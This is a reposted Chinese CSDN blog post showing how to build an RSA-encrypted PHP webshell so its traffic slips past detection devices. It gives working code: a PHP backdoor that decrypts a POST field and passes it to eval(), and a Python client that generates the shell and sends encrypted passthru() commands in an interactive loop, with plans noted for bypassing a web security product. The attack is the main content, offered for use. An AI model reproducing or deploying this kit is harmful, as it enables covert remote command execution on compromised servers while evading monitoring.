php rsa加密乱码_RSA在webshell中的使用

最新推荐文章于 2021-03-25 11:30:45 发布
最新推荐文章于 2021-03-25 11:30:45 发布
阅读量230 收藏
点赞数
文章标签: php rsa加密乱码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30240765/article/details/112432725
版权

   本文将简单介绍RSA在webshell中的使用,旨在帮助小白们快速制作自己的流量混淆工具。

关于RSA

援引百度百科对RSA的介绍:

RSA是1977年由罗纳德·李维斯特(Ron Rivest)、阿迪·萨莫尔(Adi Shamir)和伦纳德·阿德曼(Leonard Adleman)一起提出的。当时他们三人都在麻省理工学院工作。RSA就是他们三人姓氏开头字母拼在一起组成的RSA公开密钥密码体制的原理是:根据数论,寻求两个大素数比较简单,而将它们的乘积进行因式分解却极其困难,因此可以将乘积公开作为加密密钥......

78bbf42c02d7077b9e49a9f8e5c68cc5.png

具体的原理什么的就不多说了,这也不是专门介绍密码学的文章。我们只需要知道它是一个强加密,有公私匙,可以过流量检测设备就行了。

过程实践

首先使用openssl来进行公私匙的生成:

openssl genrsa -out privkey.pem 2048openssl rsa -in privkey.pem -out publickey.pem -pubout

然后使用M2Crypto进行利用文件进行文本加密:

def pri_encrypt(msg, file_name):    rsa_pri = M2Crypto.RSA.load_key(file_name)    ctxt_pri = rsa_pri.private_encrypt(        msg.encode(), M2Crypto.RSA.pkcs1_padding)    ctxt64_pri = base64.b64encode(ctxt_pri)    return ctxt64_pri

比如对test进行加密:

30fcb9193a79be037d0cd8d0fcb38286.png

可以看到字符串已经成功的加密了。接下来就是PHP文件的处理了,一样使用openssl这个库,来操作,缺点就是需要依赖:

<?php class Rsa {    private static $PUBLIC_KEY= "MyPubKey";    private static function getPublicKey(){        $publicKey = self::$PUBLIC_KEY;        return openssl_pkey_get_public($publicKey);    }    public static function publicDecrypt($encrypted = ""){        if (!is_string($encrypted)) {            return null;        }        return (openssl_public_decrypt(base64_decode($encrypted), $decrypted, self::getPublicKey())) ? $decrypted : null;    }}$cmd=$_POST['MyPass'];$rsa = new Rsa();$publicDecrypt = $rsa->publicDecrypt($cmd);$res=eval($publicDecrypt);

这样我们的主要的文件就算写好了,下面就是编写一个简单的webshell管理工具了,代码如下(代码有点烂,能跑起来在说):

#!/usr/bin/python# coding: utf-8# Author: lengyi@HongHuSECimport sysimport argparseimport requestsimport base64import M2Cryptoimport osimport iosys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')def creatkey():    return os.system('openssl genrsa -out privkey.pem 2048\nopenssl rsa -in privkey.pem -out publickey.pem -pubout\n')def pri_encrypt(msg, file_name):    rsa_pri = M2Crypto.RSA.load_key(file_name)    ctxt_pri = rsa_pri.private_encrypt(msg.encode(), M2Crypto.RSA.pkcs1_padding)    ctxt64_pri = base64.b64encode(ctxt_pri)    return ctxt64_pridef get_args():    arser = argparse.ArgumentParser(prog="SimpleRSA webshell",                    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),                    epilog= "Usage:\n1、python3 SimpleRSA_shell.py -c filename -p password \n2、python3 SimpleRSA_shell.py -u url -p password")    arser.add_argument("-c", "--create", nargs='?', help="Create a webshell(default password is pass)")    arser.add_argument("-p", "--password", nargs='?',default="pass",help="Set password && Link password",dest='password')    arser.add_argument("-u", "--url", nargs='?',help="Set Url")    args = arser.parse_args()    return argsdef createphpshell(shell,pwd, pubkey):    with open("demo.php","rb")as f:        shelltxt=f.read().decode()        shelltxt = shelltxt.replace("MyPass", pwd).replace(            'MyPubKey', pubkey.decode())        with open(shell, "w") as f1:            f1.write(shelltxt)        print(f"[+]php马存放在{shell},链接密码{pwd}")def main():    args = get_args()    if (len(sys.argv) == 1):        print(f"Usage: python3 {sys.argv[0]} -h")        exit()    elif (len(sys.argv) == 5 and args.create != None):        if (os.path.exists("publickey.pem") == False or os.path.exists("privkey.pem") == False):            print("[+]正在生成公私钥对...")            if (creatkey() == 0):                print("[+]生成成功")            else:                print("[-]失败,请检查权限问题")        pubkey_file = './publickey.pem'        with open(pubkey_file, 'rb') as f:            pubkey = f.read()        createphpshell(shell=args.create.strip(), pwd=args.password.strip(), pubkey=pubkey)    elif(len(sys.argv) == 5 and args.url.strip()!=None):        prikey_file = './privkey.pem'        payload = "passthru('123');"        while (True):            encryptshell = pri_encrypt(payload, prikey_file)            data = {                args.password.strip(): encryptshell            }            headers = {                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",                "Accept-Encoding": "gzip, deflate, br",                "Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7",                "Connection": "keep-alive",                "Referer": "https://www.google.com.hk/",                "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36",            }            print(requests.post(args.url.strip(), data=data, headers=headers).text.strip())            payload = input(">")            if payload == "exit":                sys.exit()            else:                payload = f"passthru('{payload}');"    else:        exit()if __name__ == '__main__':    main()

demo效果:

f27437f184ed86dd98a045703cb4ddfa.png

可以创建马、与进行webshell的连接。

效果

使用工具执行命令,发现可以成功的接收返回的结果:

d84111589da4b158cf7c5dac05ec2653.png

流量如下:

085f0948e5bc5de4bf0b72ba37b0df38.png

TODO:

双向流量加密

命令执行bypassD盾

     ▼更多精彩推荐,请关注我们▼

faf121244aa91dedb1589dae641dbb36.png

Eason Rain
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
RSA加密解密web应用
zzh15843135906的博客
11-18 360
RSA加密rsa怎么用坑点 rsa是一种非对称加密 详细概念看百度吧,具体算法内容日后更新 所以,简要记录一下rsa怎么用和我沙雕的遇到的问题吧。 rsa怎么用 rsa是非对称加密,自然就有公钥和私钥。公钥加密,私钥解密。 最简单的使用方式就是通过openssl生成一对公钥和私钥。个人不推荐在一些网站上去申请rsa的公私密钥。线上申请的话很可能暴露密钥。 然后我就在web后端和前端放置了已经生成好...
用ZendGuard 加密php webshell
Coisini的博客
06-09 481
现在很多linux管理员都会一招,grep eval 大法,查找那些年错过的webshell,那些年错过的基友们苦思冥想出了对抗的办法。 ZendGuard是一款php加密工具,它可以编译php源码变为字节码,类似于java的虚拟机的字节码,然后让zend虚拟机运行字节码,以此来提高php的运行速度,因为不用虚拟机,php运行脚本的方式是读一行代码,运行一行,效率很低,而虚拟机则效率高多了,题...
js实现对象字典排序和base64+md5签名
baidu_38424904的博客
10-03 967
//md5加密方法
rsa 传输乱码 php,RSA 加密传输 (php)
weixin_39533742的博客
03-10 126
RSA加密传输:对于初接触RSA加密的童鞋来说,很可能会被绕进去。最近写了一个RSA加密传输的需求,总结一下。希望能对你有点帮助。首先要明白以下几点:1:公钥和私钥一定是成对的才可以2:私钥是保密的,公钥是公开的3:公钥和私钥,可以互为加密和解密4:用其一个密钥加密数据,则只有对应的那个密钥才能解开主要有两种用法1:公钥加密A传输数据给B(1),A用公钥加密数据,传输给B(2),B用私钥解密2:...
php rsa加密乱码_php RSA加解密
weixin_39974223的博客
12-23 321
相关介绍RSA算法属于非对称加密算法,非对称加密算法需要两个秘钥:公开密钥(publickey)和私有秘钥(privatekey).公开密钥和私有秘钥是一对,如果公开密钥对数据进行加密,只有用对应的私有秘钥才能解密;如果私有秘钥对数据进行加密那么只有用对应的公开密钥才能解密.因为加密解密使用的是两个不同的秘钥,所以这种算法叫做非对称加密算法.简单的说就是公钥加密私钥解密,私钥加密公钥解密.需要注意...
RSA.zip_RSA 加密解密_rsa_rsa加密算法_rsa加密解密_rsa加密解密算法
09-20
RSA算法是一种非对称加密算法,它在信息安全领域有着广泛的应用,例如数字签名、数据加密等。本资源提供了RSA加密解密的源码,适用于学习和理解RSA算法的工作原理及其实现。 首先,RSA算法的核心原理基于大数的因式...
RSA.rar_RSA 加密解密_rsa_rsa加密 文件_加密压缩
最新发布
09-23
压缩包的"RSA"文件可能是一个程序、代码库、教程文档或者演示实例,详细展示了RSA加密解密的步骤和实践。如果你需要具体了解如何使用RSA,可能需要解压文件并查看其的内容,包括可能的源代码、密钥生成脚本、...
rsa.zip_rsa_rsa 加密算法_rsa加密_rsa加密解密_密匙
09-19
RSA算法是一种非对称加密算法,由Ron Rivest、Adi Shamir和Leonard Adleman在1977年提出,是目前最广泛使用的公钥加密技术之一。它的核心特点是使用一对密钥,即公钥和私钥,用于加密和解密数据。这种特性使得RSA在...
rsa.rar_RSA加密文件_rsa_rsa file encrypt
09-22
在标题"rsa.rar_RSA加密文件_rsa_rsa file encrypt",我们看到“rsa.rar”可能是一个包含RSA加密工具的压缩文件,该工具能够用于加密和解密文件。"RSA加密文件"表明这个程序专注于使用RSA算法来处理文件的加密过程...
RSA.rar_rsa_rsa 加密_rsa加密_vlong
09-19
具体到"RSA.rar_rsa_rsa 加密_rsa加密_vlong"这个压缩包,它可能包含了一个或多个关于RSA加密的示例程序或者代码片段。"www.pudn.com.txt"可能是从pudn.com这个网站获取的有关RSA加密的文档或教程,可能解释了算法...
基于PHP RSA密文过长加密解密 越过1024的解决方法
12-17
如下所示: <?php namespace helpers; class OpensslRSA{ //echo $private_key 私钥; public $private_key = '-----BEGIN RSA PRIVATE KEY----- MIICXQIBAAKBgQC+L7ENzBHxKOqjuFHPFKlAt40BatVZhUAHw/G05XshpTGqm9Rv 8wG0EAbFbdo9PuB8DiXdPQLyIfaqkTgpsPjJ1Ow7WKxmYbqZN5IW/GN+TyFWP+MB 2W6IBLPWBDvAl2NJlmU8j3LCPJW1dH4zP1Oitkx
php 木马的分析(加密破解)
10-29
前一段时间上网查找到了一个经过“加密”过的php木马,出于好奇就对其代码进行了分析
php webshell 加密代码
Yatere的天平秤
04-07 1775
import re import sys import base64, codecs from random import random, randrange, choice, shuffle, randint from collections import * from inspect import getargspec def random_string(charset = 'abcdefgh
分离Weevely加密模块加密任意WebShell
blrk
03-22 1177
http://www.freebuf.com/tools/7875.html
php加密webshell上传,php webshell 加密代码
weixin_30299099的博客
03-25 239
import reimport sysimport base64, codecsfrom random import random, randrange, choice, shuffle, randintfrom collections import *from inspect import getargspecdef random_string(charset = 'abcdefghijklmn...
谈一下HTTPS的加密传输过程
长不大的大灰狼
08-31 1013
1 前情提要 (1)对称加密 通信双方采用同样的密钥进行加密和解密。 (2)非对称加密 通信双方加密和解密使用不同密钥。假设两个用户要加密交换数据,双方交换公钥,使用时一方用对方的公钥加密,另一方即可用自己的私钥解密。 2 HTTPS的加密过程 HTTPS实际上就是HTTP协议先和SSL进行通信,再由SSL(443端口)和TCP进行通信,相当于在HTTP的身上披上了一层盔甲。 具体过程: ① 证书验证阶段: 1)浏览器发起 HTTPS 请求; 2)服务端返回 HTTPS 证书; 3)客户端验证证书是否合法
php rsa 文,PHP语言RSA使用总结
weixin_39654917的博客
03-12 83
1.密钥格式有两种:A.PKCS8(JAVA适用)B.PKCS1(非java适用)可以使用工具进行格式转换,支付宝官网有.2.证书格式有A.pfx里面有私钥和公钥,读取可能需要密码,如果没有密码传入"".openssl_pkcs12_read(string$pkcs12,array&$certs,string$pass) :boolB.cer存储使用二进制格式,文本打...
php rsa加密乱码_php RSA加密传输代码示例
weixin_34476045的博客
12-31 121
涉及敏感数据的传输,双方最好约定使用加密解密。那RSA非对称加密就大有作为了。服务端可以保留自己的私钥,发给客户端对应的公钥。这样就可以互相加解密了。phprsa加解密实现:首先要生成一对公钥私钥。前提是linux机器上安装了openssl命令。生成私钥文件:openssl genrsa -out rsa_private_key.pem 1024利用私钥,生成公钥:openssl rsa -in...
php webshell代码混淆,php webshell 加密代码
weixin_30562757的博客
03-21 226
import reimport sysimport base64, codecsfrom random import random, randrange, choice, shuffle, randintfrom collections import *from inspect import getargspecdef random_string(charset = 'abcdefghijklmn...
RSA算法在Windows文件加密软件的实现与优化
该研究旨在探讨RSA算法在文件加密领域的应用现状和可行性,强调了在信息安全领域使用RSA算法进行文件加密的重要性和意义。 RSA(Rivest-Shamir-Adleman)算法是一种非对称加密算法,因其安全性高和广泛应用于数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值